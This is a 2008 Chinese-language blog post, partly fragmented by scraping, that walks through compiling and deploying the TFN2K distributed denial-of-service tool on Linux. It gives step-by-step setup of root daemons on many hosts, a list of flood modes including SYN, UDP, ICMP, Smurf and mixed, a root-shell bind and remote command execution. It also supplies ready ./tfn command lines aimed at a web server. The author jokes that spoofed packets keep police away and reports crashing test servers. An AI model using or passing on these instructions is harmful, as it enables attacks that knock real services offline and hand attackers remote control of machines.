Rss订阅

首页 »Linux » linuxddos:Linux操作系统中实现DDOS攻击的思路方法 »正文

linuxddos:Linux操作系统中实现DDOS攻击的思路方法

来源: 发布时间:星期三, 2008年12月17日浏览:2次评论:0

　　软件Software用

是最有名

DDOS

首先说我们用来攻击

客户机和服务器

配置思路方法

使用当下最有名

REDHAT Linux进行测试

本次攻击测试我使用

是FEDORA CORE3

　　开始设置服务器:

　　解压 tar -zxvf tfn2k.tgz

　　1.安装TFN2K

　　TFN2K为开放原代码

软件Software

所以需要我们进行编译

这个不用说了

编译应该都会

吧

但有几个地方是必需注意

使用区别版本和厂商

Linux需要区别

设置

　　先修改src/ip.h

　　注释掉以下部分

否则编译出错

　　/*struct in_addr

　　{

　　unsigned long

s_addr;

　　}; */

　　然后make进行编译

　　编译时会提示你输入服务器端进行密码设置8-32位

(攻击

时候需要输入密码)编译后会出现两个新

执行文件td 和 tfn,其中td是守护进程

也是客户机

使用进程

而tfn是服务器控制进程

如果想攻击别人就必需先起动td这个进程

然后再运行服务器进程

否则攻击无效,更改密码可以执行mkpass进行更改

最后在所有

客户机中安装并运行td(需要ROOT权限)

并且在服务器上建立

个文本文件

文件中记录所有

客户机IP地址(用VI编辑

个就可行了)

格式为:

　　192.168.0.1

　　192.168.0.2

　　192.168.0.3

　　IP

　　IP

　　.....

　　然后在主服务器上运行./tfn

　　2.DDOS攻击实现

　　./tfn直接回车大家可以看到

些参数,英文好

朋友估计不用我来多讲了:)

　　格式./tfn <参数>

　　无用

参数我们不提,我们来说攻击用

　　-f 这个参数后面跟刚才所写

文本文件名,就是真正实现DDOS攻击,而不是DOS

　　-h DOS攻击,也就是单机,

对

攻击后面跟

个主机或IP地址

　　-p 后面指定

个端口,不用说了

　　-c 最关键

参数,

共有11个选相

　　0 - 停止攻击,发善心用

　　1 - 反欺骗等级设定 ,

TFN这个工具在攻击

时候所发出

数据包是带有源地址

,但是源地址是随机

,也就是说地址不是你自给

,所以不用担心警察抓,哈哈

　　2 - 改编数据包

包尺寸:缺省

ICMP/8,smurf,udp攻击缺省使用最小包

你可以通过改变每个包

有效载荷

字节增加它

大小

　　3 - 绑定root shell:启动

个会话服务

然后你连接

个指定端口就可以得到

个root shell

　　4 - UDP洪水攻击:这个攻击是利用这样

个事实:每个udp包被送往

个关闭

端口

这样就会有

个ICMP不可到达

信息返回

增加了攻击

能力

　　5 - SYN洪水攻击:这个攻击有规律

送虚假

连接请求

结果会是目标端口拒绝服务

添瞒TCP连接表

通过对不存在主机

TCP/RST响应增加攻击潜力,是标准

拒绝服务攻击.

　　6 - ICMP响应(ping)攻击:这个攻击发送虚假地址

ping请求

目标主机会回送相同大小

响应包

　　7 - SMURF攻击:用目标主机

地址发送ping请求以广播扩大

这样目标主机将得到回复

个多倍

　　8 - MIX攻击:按照1:1:1

关系交替

发送udp,syn,icmp包

这样就可以对付路由器

其它包转发设备

NIDS,sn

fers等,轮番轰炸:)

　　9 - TARGA3攻击

　　10 - 远程命令执行,这个参数是TFN

附加功能,其实TFN

攻击不仅仅是DOS,还可以远程

进行明令控制,如:

　　./tfn -f hostext -c 10 -i "mkdir /root/edison" 在所有

HOST上root家目录建立edison,-i后面跟"命令"

　　参数基本说完,下面攻击

　　./tfn -f hostext -c 4 -i www.xxx.com

　　使用hostext文件中记录

主机对163服务器进行UDP攻击(所有

主机中必需已经起动td进程)

　　./tfn -f hostext -c 5 -i www.xxx.com -p 80

　　使用hostext文件中记录

主机对163服务器进行TCP拒绝服务攻击(80攻击WEB,其他不用说了)

　　./tfn -f hostext -c 6 -i www.xxx.com

　　使用hostext文件中记录

主机对163服务器进行ICMP攻击(PING攻击,缓冲区溢出马上死机)

　　./tfn -f hostext -c 8 -i www.xxx.com

　　使用hostext文件中记录

主机对163服务器进行ICMP&TCP&UDP轮番攻击(如果对方是sn

fer

定哭死)

　　./tfn -f hostext -c 0

　　让所由主机停止攻击

　　基本说完,最后说说我

测试结果

　　

对

攻击,攻击方式TCP 连接方式本地本地CPU13% 被攻击

服务器CPU使用率70%以上,并时时波动

　　 2对

攻击,攻击方式TCP 连接方式本地本地单机CPU13% 被攻击

服务器CPU使用率100%

　　 5对

攻击,攻击方式TCP 连接方式本地本地单机CPU13% 被攻击

服务器死机.本人家里只有6台机器,但如果再多点,几十台机器,

般

个人服务器肯定要死掉了

　　

对

攻击,攻击方式ICMP 连接方式本地本地CPU18% 被攻击

服务器CPU使用率96%以上,并时时波动 2对

攻击,攻击方式ICMP 连接方式本地本地单机CPU18% 被攻击

服务器以经无法上网,几乎无法使用,半小时内死机

标签：ddos攻击软件 ddos攻击器 ddos攻击 linuxddos

下载文章的 PDF文档电子版离线看

顶一下

2008-12-17 linuxddos:Linux对Windows实现DDOS攻击的思路方法
2008-12-14 分布式拒绝服务攻击:DDOS攻击俗称分布式拒绝服务
2008-12-4 freebsdipfw:小规模DDoS用Freebsd+IPFW搞定
2008-12-4 vpnserver:解决R9的VPNserver的DDOS问题
2008-12-4 ddos攻击:让我们远离攻击---关於 DDoS 攻击事件的探讨
2008-12-4 防范ddos攻击:DDoS拒绝服务攻击和安全防范技术
2008-12-4 ddos攻击原理:DDoS攻击原理及防范（六）
2008-12-4 如何ddos攻击:如何减轻DDOS攻击危害
2008-12-4 ddos攻击原理:DDoS攻击原理及防范（一）
2008-12-4 ddos攻击原理:DDoS攻击原理及防范（五）

专注于互联网--专注于架构

首页 »Linux » linuxddos:Linux操作系统中实现DDOS攻击的思路方法 »正文

linuxddos:Linux操作系统中实现DDOS攻击的思路方法

相关文章

读者评论

发表评论

热门标签

精华推荐

Dig排行

阅读排行

评论排行